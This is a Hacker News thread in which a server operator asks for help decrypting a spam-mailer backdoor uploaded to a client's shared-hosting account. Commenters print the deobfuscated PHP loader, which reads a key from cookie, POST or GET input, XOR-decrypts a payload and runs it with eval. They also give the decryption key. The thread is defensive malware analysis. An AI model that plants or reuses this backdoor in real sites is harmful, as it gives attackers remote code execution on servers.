Ask HN: Can you decrypt this evil thing?

7 points by noduerme 14 years ago

The back story is, someone got a stolen FTP password to a client's account on a shared server and uploaded this. It's some kind of darkmailer, since I spent the next three days getting that server off blacklists. It doesn't look like the attacker got access outside the account. The account's been cleaned out, but I still don't know what else this might have done. I got one level of deobfuscation in -- that's the easy part -- but it looks like it takes an input string to decrypt what's inside that. There are two parts, one in PHP and the other in perl.

http://pastebin.com/ctswucid

http://pastebin.com/vVjYrikW

gulbrandr 14 years ago

The code is obfuscated as ascii characters in the $e variable. It uses the PHP function 'cor' to 'decrypt' the code (I think the same method is used in evil.pl).

The PHP code is:

if (!@isset($_SERVER)) { $_COOKIE = &$HTTP_COOKIE_VARS; $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; } $k = $_COOKIE['key']; if (empty($k)) { $k = $_POST['key']; } if (empty($k)) { $k = $_GET['key']; } if (!@function_exists('decrypt')) { eval('function decrypt($e,$k){if(!$k){return;}$el=@strlen($e);$kl=@strlen($k);$rl=$el%$kl;$fl=$el-$rl;for($o=0;$o<$fl;$o+=$kl){$p=@substr($e,$o,$kl);$d.="$k"^"$p";}if($rl){$p=@substr($e,$fl,$rl);$k=@substr($k,0,$rl);$d.="$k"^"$p";}return($d);}'); } $d = @decrypt($d, $k); eval($d);

noodly 14 years ago

For PHP script, the key is:

SjJVkE6rkRYj

and decrypted evil script is here:

http://pastebin.com/z53aByWX

I didn't look at perl script.

noodly 14 years ago

And here's decrypted perl script: http://pastebin.com/7RDpTXDp
It does almost the same thing as PHP script, and uses the same key :P
noduerme 14 years ago

Thank you!!!!!